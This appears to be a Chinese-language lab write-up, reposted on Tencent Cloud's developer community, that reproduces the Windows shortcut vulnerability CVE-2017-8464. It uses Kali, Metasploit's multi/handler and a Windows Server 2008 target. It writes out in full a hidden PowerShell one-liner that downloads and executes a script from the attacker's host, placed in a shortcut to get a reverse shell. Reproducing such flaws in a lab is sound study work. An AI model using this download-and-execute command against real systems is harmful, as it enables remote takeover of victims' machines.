首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

CVE-2017-8464漏洞复现

漏洞介绍:Microsoft Windows 中有一个远程代码执行漏洞,允许在经特殊设计快捷方式图标显示时允许发生远程代码执行。成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。

运用Metasploit对目标主机所存在的漏洞进行利用。选用multi/handler监听模块,利用后可获取shell。

下面是利用过程:

首先我们要准备好CVE-2017-8464的复现环境,kali虚拟机和windows server2008。

攻击机:kali IP:192.168.137.133

靶机:windows server2008 IP:192.168.137.132

1.打开kali终端,生成一个powershell文件

2.然后将生成的文件移动至/var/www/html目录下

3.开启apache服务

4.在网页尝试访问一下

5.访问没有问题,我们启动MSF,使用监听模块multi/handler,并配置好对应选项

6.然后开始监听

7.然后我们切换到windows server2008,创建一个快捷方式

8.我们在这里输入构造好的路径代码:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"

9.点击下一步,然后点击完成,生成的就是一个powershell快捷方式

10.我们双击运行一下快捷方式,因为这个快捷方式秒退,无法截图,所以这里

就不贴图了,双击大家都会。然后我们切回kali虚拟机,发现已经反弹到了shell

11.我们输入常用命令试试

攻击成功!

这个漏洞非常简单,但是命令容易输错,大家复现的时候一定要注意。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20190831A06FHH00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券